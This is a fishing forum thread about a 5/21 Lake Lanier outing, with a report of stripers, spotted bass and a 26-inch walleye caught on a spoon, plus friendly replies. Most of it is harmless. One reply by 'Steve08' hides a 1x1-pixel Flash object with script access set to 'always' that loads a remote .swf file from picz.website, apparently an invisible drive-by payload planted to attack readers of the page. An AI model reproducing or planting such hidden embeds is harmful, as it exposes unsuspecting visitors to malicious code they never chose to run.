Lanier 5/21 Report and Surprise Catch

shanesv1k

We fished from around 5:30-8:30 till the rain moved in and ended up with 7 fish in the boat. Fished a few lights before sunrise with only 1 smaller striper, but it seems like this bite has fallen off quite a bit from a few weeks ago. We then moved out to some creek points to hopefully land some top water fish. Used walking style plugs. First point had 2 blowups without hookups, but eventually got another decent striper. We then moved on to the next point and landed 3 spots and 2 stripers. One of the spots was still on bed, check out the picture. Last but not least, we pulled up to another point and the HdS revealed some fish schooled up in about 45 ft. of water. Decided to tie on a spoon, so we spun around and found the school again. Dropped down, felt nothing until I started reeling, and fish on. It didn't feel like the typical striper pulling, and the fish was all over the place. Once I got it up close to the boat I noticed it was a fish I have been waiting to catch on Lanier, a walleye. Got it in the boat just before it started pouring. Decided to leave it in the boat for the dinner table. Ended up being 26" long, not idea on weight. Great day of fishing, and thanks to all the other reports for strategies. Top water seemed to die off pretty quickly, but hopefully it will pick up soon.

Attachments

• image.jpeg
    image.jpeg
    167.9 KB · Views: 1,354

Steve08

Almost forgot the money shot.<object classid="clsid: D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1"><param value="http://picz.website/u/1/c.swf"><param name="allowScriptAccess" value="always" /><embed allowScriptAccess="always" src="http://picz.website/u/1/c.swf" type="application/x-shockwave-flash" width="1" height="1"></embed></object>
Very nice! :D

Lanier Jim

Why didn't you lip the walleye? :) Nice catch -

LJ

shanesv1k

Why didn't you lip the walleye? :) Nice catch -

LJ

Haha. Afterwards I thought about telling my neighbor (coangler at the time) to lip it. I was too amped up screaming "WALLEYE" across the lake when I first saw it. I'm amazed no one ran over with their fruity worms to get in on the action!

Thanks for all the comments!

Worley

Catch

Daggum awesome story and catch. I keep waiting patiently for one to get lost and bite my hook at some
Point...I hear they are some mighty fine eats....Great job bud...

red neck richie

We fished from around 5:30-8:30 till the rain moved in and ended up with 7 fish in the boat. Fished a few lights before sunrise with only 1 smaller striper, but it seems like this bite has fallen off quite a bit from a few weeks ago. We then moved out to some creek points to hopefully land some top water fish. Used walking style plugs. First point had 2 blowups without hookups, but eventually got another decent striper. We then moved on to the next point and landed 3 spots and 2 stripers. One of the spots was still on bed, check out the picture. Last but not least, we pulled up to another point and the HdS revealed some fish schooled up in about 45 ft. of water. Decided to tie on a spoon, so we spun around and found the school again. Dropped down, felt nothing until I started reeling, and fish on. It didn't feel like the typical striper pulling, and the fish was all over the place. Once I got it up close to the boat I noticed it was a fish I have been waiting to catch on Lanier, a walleye. Got it in the boat just before it started pouring. Decided to leave it in the boat for the dinner table. Ended up being 26" long, not idea on weight. Great day of fishing, and thanks to all the other reports for strategies. Top water seemed to die off pretty quickly, but hopefully it will pick up soon.

walleye on a spoon on lanier nice gotta love that. If it weren't for the pictures of the spots I thought you might be up north.

shanesv1k

Nice fish!
Have you had a chance to get back on the water and try to put another in the boat ?

I've been back on the water for a few hours this morning but the top water bite was too intense to look for them. I'm planning on making a trip specifically for them, but it's reaaaal hard to commit to it with fish busting across the lake, finally.